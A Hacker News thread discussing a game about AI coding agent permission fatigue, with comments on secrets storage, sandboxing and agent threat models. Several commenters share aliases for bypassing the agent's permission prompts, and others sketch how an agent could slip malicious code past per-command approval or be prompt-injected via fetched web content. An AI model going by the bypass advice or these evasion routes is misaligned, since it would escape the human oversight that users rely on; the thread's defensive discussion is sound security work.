hackernews client

Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue

356 pointsposted a day ago

(llmgame.scalex.dev)

144 Comments

xg15

a day ago

This is amazing!

Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)

I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!

Wirbelwind

19 hours ago

Good catch, this has now been nerfed and this approach has gotten its own title

smaudet

16 hours ago

Actually, the only secure default is to deny everything...how do you know that innocent command is actually innocent?

ssl-3

16 hours ago

A strange game. The only winning move is not to play.

SOLAR_FIELDS

14 hours ago

It’s the security mantra: the safest code is the one you never release. Code that never runs is the most secure code

brendoelfrendo

13 hours ago

A computer is only secure if it remains powered off and airgapped.

HappMacDonald

12 hours ago

Turn off your computer and make sure it powers down

Drop it in a 43-foot hole in the ground

Bury it completely, rocks and boulders should be fine

onionisafruit

10 hours ago

> rocks and boulders should be fine

You’re setting yourself up for a supply chain attach here if you trust whatever rocks and boulders are sitting around. A well resourced adversary may have placed power supply boulders and wifi rocks in your back yard.

ssl-3

8 hours ago

I keep a large supply of thermite on-hand just to make sure that the computer is completely burned every day after it gets dropped into the pit.

Tomorrow is a new day.

JonathanMerklin

8 hours ago

Straight Outta Lynwood was a great album. One of the CDs that I took out of my case the most often as a struggling nerdling who was still a year or two away from having scrounged up enough spare cash for a secondhand iPod.

yuye

5 hours ago

Virus alert! I've also burned all of my clothes I may have worn any time I was online.

KajMagnus

19 hours ago

Top 18%! I denied everything, unless I could see at a glance that it was safe (like Git diff)

xg15

18 hours ago

Glad I could help. I love the new title :D

progforlyfe

19 hours ago

Just like real life! deny it from doing anything and you're safe :)

spurgelaurels

21 hours ago

Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.

londons_explore

21 hours ago

Plenty of people would. But then I guess they're in env and probably already available to Claude

isityettime

an hour ago

Just aside from all of the security concerns, this is the wrong place to define global environment variables for zsh in the first place! That would be ~/.zshenv. So even if you're clueless about storing secrets in plain text and exporting them as env vars everywhere, ~/.zshrc should still be clean.

shlewis

10 hours ago

I don't do this myself, but I can also see how many would do this.

arowthway

8 hours ago

Also, there's nothing inherently insecure about feeding secrets to an LLM, it's only one element of the lethal trifecta.

otabdeveloper4

8 hours ago

Having "tokens and secrets" at all is a lack of security hygiene.

nish__

21 hours ago

Where would you put them?

godelski

11 hours ago

Literally anywhere else! Your dotfiles should be publishable to github. If they aren't you're doing them wrong.

A good thing to do is organize. You can actually load different files. Here's a pretty common pattern that you'll find and it'll illustrate how to do other things

  if [[ $(uname) == "Darwin" ]]; then
      source "${INSERT_SOME_DIR}/osx.zsh"
  elif [[ $(uname) == "Linux" ]]; then
      source "${INSERT_SOME_DIR}/linux.zsh"
  fi

You do this for loading based on the operating system. You might want some aliases, commands, or other routines in one but not the other. For example, in my linux one I have stuff for cuda paths. You can do all sorts of things too, like make a (generically named) work file, which you don't publish to github but you load it if it exists. Then you can put all your work related aliases there and not contaminate anything else. Something like `[[ -a ${INSERT_SOME_DIR}/work.zsh ]] && source ${INSERT_SOME_DIR}/work.zsh`.

You shouldn't really load secure keys this way, but others had good answers so I thought I'd at least share a more general pattern since it isn't as well known among the less terminally inclined.

analog_daddy

7 hours ago

Okay. Here is a pattern i follow everywhere in my init files for almost every program. Define two key env vars. $DOTFILES and $ECORP. The first is path to your personal set of dotfiles. The second is path to your corporate specific dotfiles.

On personal pc no need to define the $ECORP var in shell init. On work pc define that var.

based alone on that you can conditionally do almost anything.

- shell source files/aliases

- vim/editors enable disable plugins based on existence of env vars.

- define shortcuts in file manager.

- and i add the following to my main $DOTFILES .gitignore.

  # Any file that contains the following will be ignored.
  # Used to ignore files in corporate environment
  *ECORP*
  *ecorp*

Based on multiple years across different setups, using environment variables was the most reliable option since I have been in places where there are restrictions on where my init files can be placed and having to change a shit ton of paths in my dotfiles or just keeping a different branch for work and personal (and making sure they stay in sync) was too much of a hassle.

Additionally, maintaining hygiene is essential, where I only use a Read Only PAT token on my personal dotfiles in workenv. That way, there is no accidental way I would be able to push from my workenv.

hk__2

5 hours ago

You’re just splitting your dotfiles into a public and a private part. That’s useful if you want to publish the public part on GitHub, but not everyone wants to do this, and the issue of storing secrets in plain text files remain.

isityettime

15 hours ago

Anywhere else? Password managers have CLIs, operating systems have their own secure storage, and lots of command line apps can store secrets in the OS's secure storage (Windows Credential Store, Secrets Service or KWallet on Linux, macOS Keyring).

Project-specific secrets can be stored locally via something like SOPS or remotely with something like Hashicorp Vault or AWS SecretsManager.

Applications that have secrets to manage (e.g., Emacs) or are partly about secrets management (e.g., GnuPG, OpenSSH) all store their secrets somewhere else and have secure (not plaintext, sometimes not even on disk) storage options available.

There's no reason to store secrets in plain text in your shell configuration. Practically any choice you can think of is a better one. Even if you did, there's no reason you couldn't store them in a more specific file that ~/.zshrc sources, and let LLM agents read zshrc but block access to the file containing your secrets. (I wouldn't rely on permissions prompts for this, though, lol.)

setopt

21 hours ago

Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).

freedomben

20 hours ago

I put mine in various aes encrypted file (like `~/.secrets.aes`) and then source it explicitly when needed with:

    . <(aescrypt -d -o - ~/.secrets.aes)

I have a handful of aliases/functions to make it more smooth, but that's the core.

maccard

19 hours ago

Where are those aliases stored?

freedomben

15 hours ago

The AES encrypted file has some, plus a bunch of exported env vars. I do keep one function in my ~/.bashrc to make it simpler to invoke so I can do `source-secret ~/.secrets.aes`:

    source-secret()                                                                                                                                               
    {                                                                                                                                                             
      if [ -z "$1" ]; then                                                                                                                                        
        echo "Need filename to source"                                                                                                                            
      elif ! [ -f "$1" ]; then                                                                                                                                    
        echo "File '$1' does not exist"                                                                                                                           
      elif ! which aescrypt >/dev/null 2>&1; then                                                                                                                 
        echo "Could not find required dependency 'aescrypt'"                                                                                                      
      else                                                                                                                                                        
          . <(aescrypt -d -o - "$1")                                                                                                                              
      fi                                                                                                                                                          
    }

AnyTimeTraveler

18 hours ago

In that AES encrypted file.

It's a shellscript that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.

That encrypted secrets file could contain any shellscript, so the aliases are stored in there, together with the API-Keys and passwords.

SOLAR_FIELDS

14 hours ago

Another more secure pattern: have different shell profiles that just go dynamically inject secrets from a secrets manager. Nix is a good tool for this. You have various shell profiles configurations that call your password manager cli at bootstrap (eg new terminal tab). You auth and at bootstrap of the terminal time the secret is dynamically fetched from the password manager and injected into an env var. this has advantage over other approaches mentioned here in that the secret is never stored at rest on the end user’s machine only used in flight

Hackbraten

21 hours ago

Into `pass`, for example:

https://news.ycombinator.com/item?id=48108207

analog_daddy

7 hours ago

Just curious, any reason to prefer using age (you mentioned that you would prefer it if starting over), over something like keepass? I am currently using keepass-cli and only reason i did not use age even though i found it was that it was new to me and I never heard of it (probably not the best reason, but in this era might be a reasonable thing to stick to devil you know). So curious about your take on this.

socksy

20 hours ago

Weird to make reading zshrc supposed unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...

Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.

mrgoldenbrown

19 hours ago

Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.

gwerbin

an hour ago

Likewise I got dinged for denying a random stash-rebase-pop operation. I have no idea what the repo state is like right now. That could be a wild mess of a waste of time. It says I'm doing a refactor, so OK I guess rebase on main is a good idea. But hell no I'm not approving that in the 1 minute before a meeting.

The whole premise IMO is pretty flawed. It's interesting as an ad for the company though.

eranation

11 hours ago

Love it. One nitpick.

>npm config set registry https://npm.internal

>Pointing npm to the company's internal registry mirror as required by onboarding docs

It claimed this is safe and I was 50/50 on it but eventually rejected it.

If this README is for a public / forked repo, and that https://npm.internal is actually https://npm.internal.somethinganexternaldnscanresolve.tld

This can go bad really quickly...

In 99% of cases you would have Artifactory / Nexus (or other mirror) already set by company policy. Having a README tell you to use a different package manager url is a big red flag and seconds away from disaster...

Wirbelwind

7 hours ago

that's a good callout. .internal is a reserved TLD so it shouldn't resolve publicly, but that's a good point about being wary of changing this while letting claude refactor a project for something that's best configured separately. Moving it to permanent mutation!

axod

a day ago

Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...

orsorna

20 hours ago

About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.

gblargg

5 hours ago

I declined things like rm -rf because the path was relative and it wasn't showing me the current directory. How would I know what project it was in?

enether

18 hours ago

The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]

[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX [2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect but gets my job done on the rare occassion I need to run the coding agent locally

kvdveer

17 hours ago

A disposable sandbox wont protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.

iugtmkbdfil834

2 hours ago

<< that would severely limit the kinds of tasks you can use the agent for.

Are we just talking about API calls to providers? If so, wouldn't local agent + sandbox solve all that?

esterna

17 hours ago

On the one hand, you can set up a proxy that supplements secrets for API calls. On the other hand, you can whitelist what you need, in the simplest case with iptables (The devcontainer in the claude code repo is an example of the latter).

trehalose

15 hours ago

I wish it the scoring readout at the end would display the LLM's descriptions of the commands I shouldn't have approved. I approved the rm -rf Projects command because I thought the LLM had correctly described that it would delete everything in the Projects folder. Clearly I misread that in my hurry to answer prompts (I knew what the command would do and I guess I hallucinated that the AI had explained it), but I'd like to see what it was that I misread.

Playing this game made me very glad I don't agentmaxx.

progforlyfe

19 hours ago

I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...

zackify

a day ago

I vibe coded a TUI that just shows running lxd containers

I hit 'n' to toggle all network access minus anthropic and openai URLs.

I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.

Normally my container has full write access to staging so it can debug and validate everything on its own

kennywinker

a day ago

Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.

zackify

18 hours ago

i can view the diff locally but often times after planning with opus i get what i want.

I create a draft pr and manually review all items before then marking ready for review for the team.

So I'm not blindly pushing things to prod without review.

Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.

cobbal

a day ago

That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really under The threat model.

dns_snek

a day ago

That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.

npm run build = run an arbitrary shell command written in package.json

Meanwhile the agent could have done any of the following without approval:

- edited `package.json` to contain any arbitrary build command

- planted malicious code in `build.js` (called by `npm run build`)

- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)

nonethewiser

20 hours ago

Yup. The most secure computer is one encased in concrete and dropped into the ocean.

falcor84

18 hours ago

Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.

Wirbelwind

19 hours ago

that's a great point, and also the problem with relying on a human-in-the-loop to catch these kind of issues when it can be circumvented even if they were perfect

amarant

21 hours ago

What would a better system look like?

xigoi

21 minutes ago

Don’t give a fancy random text generator access to your computer.

dns_snek

17 hours ago

Agents should make better use of OS sandboxing facilities with finer-grained ACLs.

Less: Do you want to run "npm run build"?

More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?

Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.

Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`

SOLAR_FIELDS

14 hours ago

Don’t rely on your non deterministic agent and its creators to secure your software. Design defense in depth and trust guardrails that don’t expect Anthropic to vibe good security into existence.

If you start by treating any autonomous actor in your system as an actor with the potential to go rogue the design starts to create itself

nonethewiser

20 hours ago

Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.

conrs

12 hours ago

Yeah, echoing the comments here. It's a good idea - kind of - but it is all about digging deeper when it is sus.

The tool assumes so much. That it is fine to kill a process itself versus just asking you to kill the process. That everyone MUST have passwords in their home directory. It's all meaningless without providing the thing it is running and so no activity is technically safe.

Why do people even get the agent to run the commands it asks to run? You can solve the entire threat vector by running it yourself and giving the agent the output. Claude practically only needs things like sed, awk, and grep. It's a pattern matcher. It's a waste of yours (and its) time to have it run your project.

paddycorr

2 hours ago

Love how it always want to send my packages to random domain. Has that happened anyone in practice?

christophilus

5 hours ago

Claude Code has gotten so bad about this that I’ve stopped using it for code reviews. I may look into wiring Claude up to Codex as an alternative LLM just to compensate.

I think the issue is that I’m running Claude Code in a container so it sees that it is root, and becomes a lot more cautious. Not sure, though.

kangalioo

3 hours ago

If you're running Claude Code in a container anyways, why does `--dangerously-skip-permissions` not work for you?

christophilus

an hour ago

Claude Code won't let you do that as root. Codex's equivalent is perfectly fine, though.

Wirbelwind

a day ago

Thanks all for checking it out and your suggestions!

If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here

https://scalex.dev/blog/ai-agent-permissions/

kstenerud

19 hours ago

You might want to check out https://github.com/kstenerud/yoloai

Liftyee

a day ago

I haven't used local agentic AI yet for programming projects. Hence, -187 score

The filter for "commands I would run myself" and "commands I would let an agent run" are very different it seems.

rogerrogerr

20 hours ago

Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.

jstanley

5 hours ago

How do you know?

kleiba2

4 hours ago

Is there a light mode by any chance? Unfortunately, I cannot look at light text on black background for more than a few seconds (something must be wrong with my eyes...).

cat-whisperer

an hour ago

these days I rely on auto mode. :) it's like trust-as-a-service

t-writescode

21 hours ago

I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?

Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.

ghrl

a day ago

I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.

madrox

17 hours ago

I've long held the current agent permission model is like playing a game of "Papers, Please" and most permission models engineers implement in their own AI products is more a measure of how trusting the user is with AI than an actual permission check.

I'm of the view that future controls should be more about approving plans and rewinding durable workflows as models get better at avoiding egregious mistakes.

cyanydeez

16 hours ago

the models will never avoid egregious behavior. think of it like every "good intentions" morality tale. theres almost always some geniune context where that behavior is wanted.

instead, the coding harness or determinative tool, will need hardcoded security features.

in opencode, almost all the power comes from bash and all other permissions are just chrades. its powerful and insecure because of it.

you can sand box them but then you fight the sandbox to pipe in your assets. the sandbox becomes porous because elsewise its useless.

MCPs dont address much either.

want we are looking for is a portal or protocol that has the model and harness and the actions tunneled, like ssh, to some fixed scoped and limited shell along side the assets.

then, the user and LLM can the negotiate assets and actions as needed via the protocol.

but alas, as your comment suggests, people thing theres some perfect context thatll prevent bad things from happening. the libertarian paradise without regulation.

madrox

15 hours ago

I think you're choosing to ignore what I said about the implication of durable workflows, because you seem to be inventing some stories about my comment.

I find that well documented plans do pretty well at aligning AI to what I want it to do, and if it does go astray, as you rightly point out it can still do, it would be sufficient if I can undo it with little pain. We do this kind of thing all the time in CI/CD pipelines.

Even humans can take down production. We have all kinds of guards in place to empower while also defending against the intern accidentally dropping the DB.

hanwenn

8 hours ago

I got tired of the permission prompts and wrote a filesystem/network sandbox so I could skip all permission checks. It works on the same principle as bubblewrap, but has some niceties to separate Claude from its credentials. See https://github.com/hanwen/runclaude

ashm1104

9 hours ago

Damn this is so cool, this has the potential of being a like textbook pre training/post training quiz. Congratulations.

MeetingsBrowser

a day ago

It would be cool to see the distribution of all player scores.

Wirbelwind

a day ago

That's a great idea, stay tuned

Wirbelwind

19 hours ago

and added! Made one for each stat separately

whimblepop

21 hours ago

I got "overblocked" for this one:

  rm -rf node_modules && npm install

but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.

Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.

gamer191

21 hours ago

But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install

Wirbelwind

19 hours ago

thanks for the pointer! renamed it to npm ci so it's still 'safe'

kqr

a day ago

Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.

nardib

a day ago

Use this and save yourself:

claude --dangerously-skip-permissions

tasuki

a day ago

Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.

wildpeaks

a day ago

This is why having a human in the loop isn't enough because they will cut corners and skip reviewing what they should review.

preciousoo

a day ago

I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review

Uses tmux and gh https://github.com/Kyu/claude-pr-watch

chuckadams

a day ago

A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent

kennywinker

a day ago

A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.

chuckadams

20 hours ago

I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.

kennywinker

a day ago

It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.

maxbond

21 hours ago

Why would you do this now that we have auto mode?

qsxfthnkp2322

a day ago

I love it when Claude is dangerous

paulddraper

a day ago

  alias yolo=claude --dangerously-skip-permissions

dheera

a day ago

I got tired of typing that and just do

    alias claude="claude --dangerously-skip-permissions"

I do have a separate "claude" user on my system without sudo access and without access to my main user home dir

And yeah I know that's not perfect but I'm trying to get shit done

franze

a day ago

alias claude+="claude --dangerously-skip-permissions"

alias claude++="claude --dangerously-skip-permissions --continue"

kuboble

8 hours ago

I was so tired of all those approvals that I switched to Yolo mode exclusively.

Claude works in his own separate vm with root access, git remote set to my local copies of repository no github access etc.

I think he could still hurt me if he really wanted, but most scary stories I heard were about LLM making really bad judgements rather than actively trying to break out and do harm.

soanvig

a day ago

Fun game. Can somebody run an agent against those questions to see how it performs? :)

sandeepkd

a day ago

Interestingly I kept saying no to everything and some how I am a security conscious rare engineer who actually read the commands. Guess doing nothing is the safest approach from security standpoint.

sukhavati

a day ago

Reminds me of the "Papers, please" game. Glory to Arstotzka!

kstenerud

19 hours ago

This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.

ericlevine

16 hours ago

This really hits the nail on the head. The current permissions models are totally broken IMO. You're either approving everything, restricting access and neutering your agent, or full YOLOing and, well, good luck. The right primitives are not in place yet, and there's no clearly correct answers.

I think the right primitive is "task-based authorization", where you review a high-level task and let an LLM judge decide whether the subsequent tool calls fall into the scope of that task. It's not perfect, but it distills dozens of approvals down to one and gives you risk-based signals of whether you should pay close attention or not.

misbau

a day ago

That was fun and gave me an idea how security conscious I am.

NewJazz

a day ago

git reset --soft HEAD~1

Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?

stratos123

21 hours ago

Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.

NewJazz

20 hours ago

Commit history is data. I might not realize what happened until the gc happens.

eqvinox

18 hours ago

A bit too JavaScript specific... can't really play if you don't know that ecosystem.

mrweasel

2 hours ago

It suggests that "kill $(lsof -t -i:3000)" is completely safe, which it's not, if you don't know what runs on that port. Maybe some Javascript framework runs on that port, I don't know, but neither does the AI, the developer may have moved it, because something important runs on that port already.

martin-adams

21 hours ago

Very fun. I can only imagine building this with Claude and testing needed a bit of mental concentration.

graphememes

20 hours ago

Pressed 1 for everything, no regrets

sevenseacat

a day ago

Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer

Caught 8/8 threats "Not a single secret leaked"

→ llmgame.scalex.dev

neogodless

20 hours ago

Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer

Caught 3/3 threats "Not a single secret leaked"

So are there 3 threats? 8? Is it a different game?

Does everyone get a "good" score even if they missed 5 threats?!

t-writescode

19 hours ago

It's a game you play over one minute. They probably saw more prompts than you.

stevenalowe

21 hours ago

Sadly unplayable - gray text on a black background is very hard to read on a phone

bspammer

a day ago

To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.

hastily3114

9 hours ago

This is cool. Could be used for training. But it's a bit too easy when it's a game where you are expecting dangerous commands. The real fatigue comes from accepting hundreds of obviously safe commands during a work day. Then it's easy start accepting everything without really reading it.

carterschonwald

a day ago

some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)

ilaksh

a day ago

You can turn that off with an option in most agents.

My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.

flux3125

a day ago

> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked

Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.

fragmede

a day ago

How many car accidents have you been in, and do you wear your seatbelt when you're in a car?

cadwell

a day ago

1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)

hcks

8 hours ago

PSA: not making safe environments where you can skip all permissions and instead wasting time monitoring agents == incompetence

rvz

a day ago

This current thread is proof of AI psychosis.

stuartjohnson12

a day ago

What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...

cobbal

21 hours ago

Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].

I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.

Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.

This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?

[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c... [1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

kennywinker

a day ago

If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.

atemerev

a day ago

--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.

prerok

a day ago

I've seen these suggestions but I am really curious about the set up because I just don't get it.

If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.

So, how does such a set up work?

stratos123

19 hours ago

You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.

atemerev

15 hours ago

Git makes actions reversible. Containers and VMs allow the agent to access only the things you explicitly put inside. Okay, yes, an agent can corrupt a dev database. You need to make sure it can be easily restored anytime. Simple.

kennywinker

a day ago

Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.

atemerev

15 hours ago

Well working like that for about a year already, starting at the earliest days of agents.

kennywinker

15 hours ago

Wow a whole year! I guess it’ll never happen.

inetknght

18 hours ago

Scope Violation: `cat ~/.zshrc`

Scope Violation: `ls ~/Documents`

Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!

Trung0246

a day ago

Nice got 6/6

rib3ye

18 hours ago

claude --dangerously-skip-permissions

just give in

scotty79

19 hours ago

Permissions don't do much. They won't save you. You can just skip them completely.

If you are afraid that AI can delete something do what you'd do with potentially malicious user. Sandbox, don't give permission, setup remote backups and so on.

Also (unless prompt injected) models are not eager to start going rouge on your stuff.

But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”

Same thing goes for LLMs. Never talk with LLM about deleting stuff. Archiving, moving, retaining elswhere... sure, but never about actually destructive operations. Don't use destructive language.

wilg

20 hours ago

"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.

jMyles

20 hours ago

I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?

(I run it on a VPS of course, not my laptop)

yieldcrv

17 hours ago

that was soooo last month, “auto-mode” is the way now

another agent reviews every command and blocks destructive ones

ramonga

a day ago

Score is 6711 by just saying no to everything